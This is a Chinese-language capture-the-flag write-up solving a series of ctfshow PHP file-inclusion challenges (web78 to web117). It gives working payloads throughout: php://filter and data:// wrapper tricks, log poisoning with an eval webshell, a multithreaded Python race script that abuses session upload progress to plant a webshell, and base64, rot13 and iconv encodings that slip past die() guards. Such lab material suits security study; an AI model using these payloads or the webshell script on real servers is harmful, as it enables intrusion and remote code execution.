ctfshow-文件包含

web78

<?phpif(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
}
判断是否存在file参数如果存在将包含这个参数值文件

php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致任意文件读取。

filter伪协议

php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致任意文件读取。
file=php://filter/convert.base64-encode/resource=flag.php
base64解码即可

data伪协议简单理解就是执行自定义代码
c=data://text/plain,<?php system('tac fla?.php');?>

web79

<?phpif(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);include($file);
}else{highlight_file(__FILE__);
}
严格一点点参数值中不能存在php字符

方法一

使用data伪协议可以不使用正常的php标签使用段标签即可然后使用*代替php
file=data://text/plain,<?=system('tac fl*');?>
方法二

GET POST 联合使用
file=data://text/plain,<?=eval($_POST[1]);?>
POST 1=system("tac flag.php");

web80

<?phpif(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file);
}else{highlight_file(__FILE__);
}
要求更严格了 data协议不能使用了

那就是用日志方式

日志地址
/var/log/nginx/access.log
插入User-Agent值为
<?php eval($_POST[1]);?>
访问日志地址 post参数1=system("ls"); 查看当前目录下文件有哪些查看到有个fl0g.php文件

查看fl0g.php文件内容

web81

<?phpif(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

更严格一点不能使用冒号但是貌似没影响与web80同理

web82

参考b站视频以及session包含/反序列化

参考
<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}
禁用了. 导致上一题的日志包含也不行了只能使用session包含了 ,php里面唯一我们能控制的无后缀的就是session,需要用到到php_session_upload_progress参数,这个参数是为了获得这个文件上传进度的实时参数

这道题没开启session 如何创建session文件呢? 我们如果只要上传一个cookie 键是sessid 值任意 这样提交后 php会在默认session目录中创建一个 sess_aaa的文件路径基本上为/tmp/sess_aaa 既然有个session相关文件了服务器也就自动初始化session了

这么文件名字我们是可以控制的可以控制aaa 所以这道题如果只能包含无后缀的那就可以包含这个session的临时文件

现在文件名字我们控制了如何控制文件内容呢

控制文件内容我们需要PHP_SESSION_UPLOAD_PROGRESS 这个参数是获取实时文件上传进度的我们控制这个参数来写我们指定内容通过指定该参数的post值会拼接默认名字写进去(这句话现在不理解一会回头看一下) 刚刚群主举个例子如果PHP_SESSION_UPLOAD_PROGRESS值为123 则知道 /tmp/sess_aaa的内容为123

现在前提都准备好了但是session临时文件在文件全部上传成功后就会被删除这时需要session竞争在文件还没被删除的时候访问到这个文件简单理解就是大量的上传同一个文件持续访问某个session文件该脚本就是开启5个多线程持续的发送为何要开启多线程呢？正常情况下开启一个线程也是可以的　但是一般都竞争不出来　都是开启进程让提交的速度加大　访问的速度加大

再简单理解这个线程就是每秒提交1次文件和访问1次因为提交的速度特别快还没等访问呢文件就被删除了如果每秒提交1000次文件和访问1000次这样就大大加大访问成功的概率这个不代表

访问第500次的时候是访问第500次提交的文件而是可能访问到的是第400次提交文件时生成的文件

这里我开五个线程很快就能出结果　　我试了一下开20个进行一瞬间就出结果了
import requests
import threading
import io
a=0
url = "http://6db55daa-3871-4fd6-b564-8e6289806146.challenge.ctf.show/"
sessID = 'tzy'
data = {"1": "file_put_contents('/var/www/html/8.php', '<?php eval($_POST[2]);?>');"  # read()中需要post的内容
}
def write(session):global afileBytes = io.BytesIO(b'a' * 50)#定义一个大小为50kb的文件赋值给fileBytes变量中# 解释一下使用while循环的原因 当前函数现在开启了5次线程 也就是说 同时会向服务器提交五次write函数 如果不设置循环 也就相当于同意时间只提交五次函数 就退出程序了# 如果在函数内部定义while循环 这样就能做到 持续进行 每次提交五次函数 换位思考也就是说 提交五次函数 每一次都是一个循环 这五个都是循环 也就能做到 持续性多线程# 这种方法 和在线程外部加入一个while循环一个意思while True:if a:break#使用传进来的session对象执行post提交请求res = session.post(url,data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'# 改参数的值就是/tmp/sess_tzy文件的内容},cookies={"PHPSESSID": sessID},files={'file': ('tzy.png', fileBytes)})#print(res.request.headers)#print(res.request.body)
def read(session):global awhile True:res1 = session.post(url + '?file=/tmp/sess_' + sessID, data=data,cookies={"PHPSESSID": sessID})res2 = session.get(url + '8.php')if res2.status_code == 200:print("+++done+++")a=1breakelse:print(res2.status_code)
if __name__ == '__main__':# 开启多线程 直接解释代码 python会同时提交五次write函数 和五次read函数event = threading.Event()  # 开启多线程的对象# 这个session对象 是requests.session()类的实例化# request.session 包含 request.request的功能 比如get() post()# 而session这个类还可以自动处理cookie 会自动地处理与会话相关的内容，比如 cookies 的保存和发送# Session 对象的优势在于它会在整个会话中自动管理 cookies，并在多个请求之间共享 cookies 和会话状态。# 这意味着你只需要在第一个请求中设置 cookies，后续的请求会自动使用相同的 cookieswith requests.session() as session:for i in range(5):  # 开5个线程 执行write函数传入session对象最为参数threading.Thread(target=write, args=(session,)).start()for i in range(5):threading.Thread(target=read, args=(session,)).start()event.set()  # 唤醒线程
获得flag

web83

<?php
session_unset();
session_destroy();if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

在程序前销毁session的全部变量以及全部数据没影响我们直接加入cookie服务器识别出来存在session id后自动就初始化session了同web82一样

web84

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);system("rm -rf /tmp/*");include($file);
}else{highlight_file(__FILE__);
}
好狗直接把临时目录的文件全部删除了但是发现不影响呀

本身 session.upload_progress.cleanup = on 会清空对应 session 文件中的内容

再加上一条删除文件影响不大加快请求速度呗不加快5多线程也行反正记住就行无论他删不删对我们都没影响因为啥就算这个请求执行到删除了然后执行包含如果在执行include前0.001s又生成了一个临时文件她依旧是可以包含的最坏的情况无非也就是加快线程呗加快速度

web85

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);if(file_exists($file)){$content = file_get_contents($file);if(strpos($content, "<")>0){die("error");}include($file);}}else{highlight_file(__FILE__);
}
说实话这道题我挺蒙哪怕多线程为什么能绕过die呢每个线程都能匹配到die呀原来这道题开多线程和上一题开多线程能成功的原因不一样这一道题开5不行开20可以是因为在高并发/高线程的情况下有个特性就是竞争而竞争会导致很多的不确定性比如这道题在执行die的时候因为多线程抢占资源的原因可能会导致die还没执行成功呢 include就已经被执行成功了

web86

<?php
define('还要秀？', dirname(__FILE__));
set_include_path(还要秀？);
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}
定义了文件包含指定目录也就是说想要包含的文件必须在指定目录下否则包含不成功

难道还是要利用高线程导致竞争从而还没定义目录位置就已经执行include了吗？查看一下其他师傅的wp

结果是是这个原因 include包含的文件如果存在路径他会按照指定路径查找文件如果只存在文件名不存在路径 include首先会去定义的位置进行寻找文件没有则在当前文件所在的目录和当前工作目录下寻找所以不影响我们线程5应该就可以了不需要高并发导致的不确定行为而是普通的和服务器删除速度来竞争不是高并发的竞争

的确我说对了

注意：早session包含中

这里说一下提交请求后的请求体是不是想象的那种post 键值对的形式而是表单的形式PHP_SESSION_UPLOAD_PROGRESS 也在表单中这块的简单知识点有时间得看看
<!DOCTYPE html>
<html>
<body>
<form action="http://26bfc8ed-f28a-46ef-94a6-bbff5bb92e6b.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data"><input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /><input type="file" name="file" /><input type="submit" value="submit" />
</form>
</body>
</html>

web87

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$content = $_POST['content'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);}else{highlight_file(__FILE__);
}

参考p神文章

file_put_content和死亡·杂糅代码之缘

方法一使用过滤器中的base64 解码绕过将死亡函数进行解码变为非法字符

file=php://filter/write=convert.base64-decode/resource=hello.php

在base64解码中每四个字符为一组解码为三个字符并且只有字母为解码的字符 phpdie为6个需要在$content前任意添加两个字符

content=abPD8gcGhwaW5mbygpOz8+

将file参数的值进行url全编码使用bp

从浏览器到服务器他会自动进行一次解码为什么要两次编码呢？两点　第一点本身写文件的时候他会解码一次　第二点在过滤的时候　如果不进行二次ｕｒｌ编码　他会把关键词换成问好　这两点同时满足　这样两次ｕｒｌ编码就可以了　

验证成功同理换content的值即可得到flag

方法二使用过滤器中的rot13 编码绕过 解码绕过将死亡函数进行解码变为非法字符

和base64同理

现将payload进行rot13编码

file=php://filter/write=string.rot13/resource=hello2.php

concent=<?cuc cucvasb();?>

死亡代码<?php die('大佬别秀了');?>已经被解码为<?cuc qvr('大佬别秀了');?>

这里有个问题如果服务器开启了可以使用短标签那么服务器就会解析该短标签了我们的payload就不会被执行了就不能使用这种方法了因为该解码方式不会解码<?等符号并且会原封不动的写入到文件中

web88

<?php
if(isset($_GET['file'])){$file = $_GET['file'];if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){die("error");}include($file);
}else{highlight_file(__FILE__);
}

使用data伪协议

因为过滤了 php那就使用base编码有的时候如果base编码后出现= 或者 +号也会被过滤掉在后方加入1来混淆

比如

<?php echo `ls`?>和<?php system('ls'); ?> 一个意思

?file=data://text/plain;base64,PD9waHAgZWNobyBgbHNgPz4xMTEx

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmwqJyk/PjEx

web116

开局一个视频无法查看源码下载视频使用010打开搜索各种文件的标头标识发现存在PNG文件

PNG图片以IEND结尾复制粘贴到新建十六进制文件另存1.PNG

打开图片后

源码文件的意思就是读取一个文件输出到浏览器中

在浏览器中虽然不能右键查看源码但是可以使用view-source:

那就读取 flag.php(只能一个一个尝试)

web117

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){die('too young too simple sometimes naive!');}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

不能使用base64和rot13解码绕过了把一句话木马从UCS-2LE编码转换为UCS-2BE编码。

其实关键的不是两种编码方式(这两个编码方式可以换位置) 这两种编码方式都是一样的不会改变任何字符关键的是iconv这个函数他可以进行两个字符反转一次（切记需反转的字符必须是2的整数倍否则报错，如果报错可以通过修改密码增加字符或者在后面再加上任意一个字符反正服务器也不解析）

<?php
$result = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_POST[aa]);?>');
echo "payload:".$result."\n";
?>
#?<hp pe@av(l_$OPTSa[]a;)>?

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=hello.php

contents=?<hp pe@av(l_$OPTSa[]a;)>?